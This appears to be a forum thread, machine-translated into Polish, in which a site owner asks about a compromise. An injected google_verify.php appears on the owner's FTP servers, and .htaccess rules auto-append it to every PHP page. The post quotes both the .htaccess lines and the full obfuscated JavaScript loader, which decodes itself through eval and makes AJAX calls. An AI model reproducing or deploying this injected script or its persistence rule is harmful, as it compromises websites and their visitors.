8
Kilka dni temu miałem problemy z moimi witrynami. We wszystkich serwerach ftp mam jakiś plik php o nazwie google_verify.php iw moim pliku .htaccess następujący tekst dodano:Problem z wirusami google_verify.php i ftp passwords
<IfModule mod_php5.c>
php_value auto_append_file "google_verify.php"
</IfModule>
<IfModule mod_php4.c>
php_value auto_append_file "google_verify.php"
</IfModule>
Oto google_verify.php file:
<script>d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un
L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2
-z=null}}if(! z Ztypeof M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv
_>, =vars Z 4== =vars A= /(% $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= %
Yx);regexp :RegExp(Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if(4= SS
-v G + c G}}}; a.trim _$f Z"qabcdef".indexOf($o.substr(0,1))>=0){ H $rs So 6\'q\')
8\'\') 6\'v\') I Hi=0;i< $rs hrs[i]=parseInt($rs[i],16)- k = $rs 8\',\')+
\',\'}else{ajax gr.offset2=25; = k}; 9unR (!){eval(9 ]UrN L db&& Yt 7 -H(Yt W} 3
drt 7 OR + rt SR}} c(" $a",new Date().getTime()); $h :/]Ikey in( t) Zfalse== C1]&&
4== b A$T= v(key, C0] W ,t[key] ?t[ $T[0] [$T[1] W;key ST[0]} $h[ $h 7]=key+"="+
C0]} 3$R Oh 8 Yx) + rt+ Sh 8 Yx)} Uk L-B="POS <t="";d=\'v={@ VM$1XH:"e-",@
V`$1XH:"",*b VM$1Xv30:"l(\\\'l=Str"
\\\\_:"ing.fr",JG*2%a%fzV*aV:"omCha",>%8%8*2*5LB0_*4:"rCode("
<6#fF%3#f#7#d_$4y<d*3*6$eV*e*d$a*3&6R8#b!0G%4#d%eTM `8B6P*3K#6>*4HY/c*dPB1JJ-
a$4*6&9<7E*bQ`[email protected]&3W2E*eQ*4?Q*2E&7W5!3%b#e#8!0*8#6J `6PV#c#9!fB3*1V&6W9*7#f%6-3*d#f-
d-fy,a2%2#e T T#c!1&1/b#eT!1#c!1*4*b-d&1/4-f#f%6%2#d
^5`y<4?T*5KUB6P*3Y/9*eZw*5#a#9A*7&9/[email protected] TLP
T&1D3HK%8>[email protected]*5Y/[email protected]#[email protected]~&9D1ZwJB6A*eZG&9,d5H*3#8#7E*5?%8&7/d-eF!fJ-eFG%6y
/6B0!2G_%3#f_%3yD0%1EJ%1EHwA&5,[email protected]$f!2#e$1MX?yD1*9U%aAGA*9A&9,a2#7G-a?*1-bM?I
/1-0-7%4%1$4T#d-c `9J?%8J%3AGE&7Df*e!0*cZA#b!3*2
`aH-aOB7B7OJGI<2?GJ#aPP?$e&1W5%4z$1*7Gz$1*5I/3*4#d*0!3`!0F!0 `8$dO%6`
%4$4%b!f&5D4OOOB0#eVN-1&3W0*3$b!3*b*aw*0$b&3De%[email protected]#e-dN-1&3W2>M-
3*0K*2*5_&5WeOA%7*3#6-7%e*3&6/4%7!fN f&1,a6M$f_*b#7B1B1#7&5D7#f%a$3XUFPZ
e9QMAU$1JB4U&9Wf*5*[email protected]$1>U>@YR1
%4Q%6%4UQ%6#7&9Rb$f%fzB3B7*5?*fI/9$1*4#eUUA$1*2&6D6^F#8~#b%0%0F ea%7%eN%7!2
^7?y/5Z#e#b$e$e_Z*0yD6~GF#8^#c%0%0&4D9#8O>HB5>*[email protected]<9*5*5#8>*6>>#7YW1^??*4B7?*fGI
<7*4#6V*eOA$0V&6/[email protected]#d-awA-f#f_yW5!0#b-8*aE-d#d!3&0Wd%8*3%0$e!fT*[email protected]
aB2AAH&9<9%7`-b$e|$3-b$b&5R4$b-d$d$4|-d$4$3 j6-9Q$b%e-9w%7X&3,ac%8zK-c$f$b|-c&6R4%aM-
dN%aB1-d%e j7$a?U-4Q!3!3?&3<2-7%3-7%4-7T-7%6&1,af%f-f$0-f$1-f$3-f&9R3%0N%0X%0M%0`I,acN-
cX-cM-c`-c&6Rc-f$d-f$e-f$f-fB0&9,ac$e-c$f-cB0G!f-
7&6,a0FF#7H#6H^H&4D9P#aP#bP#cP#d&5D2#f!f*1A`$a*3*6&6/4-4GF%6GF*fG&1
/4T!1_AAAF*f&[email protected]@-bPPYD2!f?KT?-aHP&7/6%7ULV-6UB0-4&3R5!fV$d!fV$4!fV&3<7P>$a-
6MM_*b&5RczPJ^#b!3N#d `8M|G-d$bU%2P&5,a9*b>-eG-9%8>-e&1/fV%4ULVNN#e&3/6N*0VQ-
e!3>*4&3W3 ^4#8^@E~#8y<2H>$4%0_?*6*6&5/b#e#e~ ^4_$4zy<0#eV$d*0!3#c#6!3&[email protected]
fG!2#b#6y/2*[email protected]#d_$3yW2_^*fU%2H_#7&5/8M$fL%2H_^*f&5/a%0G!3^VN$dU&3<6*4A-
4#fJL#b*0&9D1T*[email protected]*5>-3>YD9#9#bH%4-8|$a*4 j5*2#b#6*2#f#6*1#eID0#b#8H#d#6H^#b
ed#9OG#8~G#9P&1D3#a#7O#f#9O#e#e&7/dO#6GJJGJP&1D5#a#9^#f#a^#a#a&9
/f#8#9!f#8#8!f~~&3D3#c#aO#dO#c#aO&7D9L~LOLJL#6yW0T*3%eM$aH>^Y<d*1~#fZ*0EXM
ea*4*5$3^^OB5GIR4N-d%b-f#f-5X$4y<e$3KO%bM$4Q*8&5<b%4N*6Q%7%[email protected]&3D4U$bz
%4Q%6~#b&9DbHB4E~|*4L%f&7R7M$3#dJJ?LV&3<[email protected]@|[email protected]^G-c^GB3T%2IWaE-
[email protected]&0<3%[email protected]!3Q$3&[email protected]??U&3Db!3*3>!0#8*2|*9&0<cH!fK#b!fP~!fYW0%8Z$aF*eFH%0
ec*8*6?#[email protected]@E-c
`6F$bZ%8`K*1^&4D9#9A$1%eQ$0$1$d&9W1#c~*2*0OF#9F&4,a1B1B1#fE*5*1*4E&4<[email protected]?-b^%a|
j9T`w*9$0w$1w&4R3|G>%8LB2*0>&5W8*2*5>-2P>NL&5,d1A-3~%f$4$4%b`&6,a0-
c-5-4*[email protected]`B5*3Y/dzB2*7*a?-2*[email protected]/2*6 ^b ^a*7!2OyD3%7$4w$e*2*2$3$a&5R5NA-
1*5`$e$dP&9/3Q`[email protected]&0<2$b*5>*c*3%2$b>YWc*0MN`%8#e-d$a&3W5>#9#6%aMKB1*3Y,ae-8*1F^-
5*c*1E&4W3?A%6%b`[email protected]#dy/9*9LA*eJG*2%a&6<aM!1%aT#e TT&[email protected]|&9<c%1|#a%e%f%eT#b
`2L#d-eF ^f#d_yRf>L-0P-9X>#fYDd ^9*4#f!2#aN*4yRb-6%3w-0%3%f%7?y/7%8T%1%4EA-
bH&0<4-8*dE>N-eE*6 ja!3*f*9U#eV*5!3&3/dNHB4B4B4*2%1|&7Rc*1EXz#fEXz
ee!fA$1$eT?~Z&6<5$4-5-4*3*0%6N%e&0<[email protected]#e!3&3/d!3-6EUE-
7L$3&0<dz*9zz$a$1%a$dYRcZH!f$b$a%b!f~Y<1EZ||N#f~~&5<9`$1#6z$f$1zzY<b`~wN$3^#7^&6R5
fHT%2&1<c%fzPZXQ$1*2&3,aeA$0%1GA%0V*a&6D8G%aL-7|`$eQI/fHJ#8B5*b%8$bK&7
/f%3%3LH*5~#8E&7DfF*8A^?!1H!1&1/7*4NK$eE*8|| [email protected]!3F*0-0%4M&3R0#6$awXKMNHY/cPMQ-
6MNK$1&3<[email protected]#[email protected]$dyR7%a|$aM$3_?G&5/f!f-f%eL%4G#7$f&7/[email protected]%6NN%a$3w&[email protected]>HY
/8*cG#9L_#f*0%7&5R6wT%fB1FLF*7&4<b
%0V%1F!fGB1w&4<c$3T$b!0UXw$3&0<9%2wKw$4|#a%8&0R1KKZX>^$ewYR6FFJEK-
fZ%1&4<5*0%7#8$b$f%fzB3ID3_~O%8Z%6M*8&5R8Z%e*a$dP#aA*b&9/[email protected]#aUU%f&6D2ZQ%8wz-3%aU
edVV#6AN%1LL&6<1A#aZ`K$eX%e&9R0X!2#7%b%8$4%3%fy<bV#c%a~|%b$a-
b&6,a5*4$fT_$f?L!1&1De*4?*8!fL$a%a| jd$4`@GF#cE-8&4D3K%a|*a$1
%aQ%a&5R6z>*[email protected]%3H>Y/e#c#c#a#aJ*7*7A&9DeJ$0wQ%b`KF&4W5L-
0$fXX%3%f%[email protected]#d!2#eN%7Xy,aa%f$3%bV*4!fB1A&6<3#f
^1T%3%e%e%4y<aK$4*6%3$bA*bJ&9D1V#8V*9A-1%1%2&6/9?E*b$e$0N%bX&7R7!0*5w%6>!0*6#d
`6XPQwwX%8M&3/8*[email protected]$b#[email protected]>-0PY,d2EE-0^E#c-3X j9KZK>-2>$bzY,d1$4Z*5%4?>[email protected]<2#d!0HXE-
d?!0&0WdE$3%fT#e TU&1/6!3-0*1#fJ%7K|&3W4G!f>*1KN`L&6<5#f#a#9#dT#d%6#fy
/8$4#d%4L$3$0Kw&0R6?A_V*2-3-8-9y<2%4%aB8%6%6???I/5F>FAF?FU
ea~?^?#6?#7?ID7A#8A#bA#dA#9&9/5#6_#a_#b_#c_&5W0>*1>*2>*3>*4Y
/4*2F*3F*6F*7F&4W8F*9F*aF*bF*c
e1*a!1*b!1*c!1*d!1&1,a7P#8$d$fK$d$ezI/9%4L#eA|#e%4#d&1D9#b*7#9*2#aP~B0YD2JJ#7$3`Q
MP&9Re#8$a|$aJOOOIDc%6M%2ZAT?&1\\\\E:"32);ev",*``ZXK*b$0$1:"al(l)
\\\'",EE!0*9Q>!0#8*2:");"};dk=[] I-r x in v){dk.push(trim(x,v))};e-l(dk
8\\\'\\\'))!v7#v8$vc%vb&:8*v9+,q-
va/+7<,b>[email protected]!bA!9BvdD+8E!7F!4G!dH#0I:90J#2K%cL!eM$7N$5O#3P#1Q$2R,cT%5U!cV!6W+
9X$6Y&8Z%d^#5_!5`$8w%9y&2z$c|$9~#4\\\\,#6^L%2*0>$f*2\' Ic=46;c--;d=(t=d
6\'!#$%&*+-/<>[email protected]^_`wyz|~\\\\\'[c])) 8t.pop())); 9 (=d K &};
9unAJAX L dE -q ]+ rN($R); 3 rr -A 2 Yr)} 3 z){ Hself=this; 3 B=="GET" A$K= F+ i+
Yt , R$K W + R F W;try{ z.setRequestHeader("Content-Type","application/x-www-form-
urlencoded" 5){}} z.onreadystatechange !){switch(#z.readyState){case 1: #L 02: #u
03: #y 04: ;= #z.r (Text; ;XML= #z.r (XML; #C[0 Q; #C[1 QText; 3#w){self.r N 3#A A)=
#A.nodeName;).toLowerCase(); 3)=="input Jselect Joption Jtextarea" A#A. >= ;
+#A.innerHTML= ;}} 3#C[0]=="200" A#J ]+#e()} #rt="";break} Uz.send(Yt)}} Um ],rg()}
a.ajax : $M();try{ H $G 2\' $D\') *c("query", $G gd gf) *F="query.php" *B SG gB gf
*rr=\' $rz\' *L SN *u Sg *y Ss *J Sx; P 5){ P)} this g !=function(#self g $kx_
%encodeURIComponent(&e ,rr ?A ?F=file ,t :Object ],C : /(2) (esponse)elemNodeName
*;ajax g +}else{ ,; - A .try{ z :ActiveXObject("M /Array 0();break;case
2=document.getElementById(3if( 4true 5)}catch(e 6.split(7.length 8.join(9this.r
:=new ;self.r (<T" ,i="?" ,rx="&" ,r =return >value ?=null , @ !){ U A){ C t[key][
G($j[0], $j[1]) Hvar I;for(J"||)==" K ,b= 4 ,w=fals L ! MXMLHttpRequest NunR (()}
O -rt+= Yx+ $ Pajax.runAJAX(Q]= #z.status Rz.open( B, S= $ T-d!3 U} , V%b%a#6Q W,
4) X.XMLHTTP" 5 Y r Z){if([]= /( ]() ^!2* _ L$o, `&0/ awindow d$R A3 e&4/
f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split(' ! # $ % & ()
* + , - ./0 2 3 4 5 6 7 8 9 : ; <=> ? @ A C G H I J K L M N O P Q R S T U V W X Y
Z [ ]^_ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)</script>
Podejrzewam, że mój pc jest zainfekowany jakimś wirusem, który może odczytać moje parametry dostępu do ftp z mojego menedżera ftp.
Czy ktoś wie coś więcej na temat tego wirusa i jak mogę wyczyścić komputer?
Dzięki z góry
Co jest w "google_verify.php"? –
Dodałem zawartość pliku google_verify.php – kukipei
Obecnie mam te same problemy. Które systemy dotyczą? Czy to naprawdę problem lokalnego wirusa, czy też systemy miały lukę? Czy problem został rozwiązany czy nadal istnieje? – testing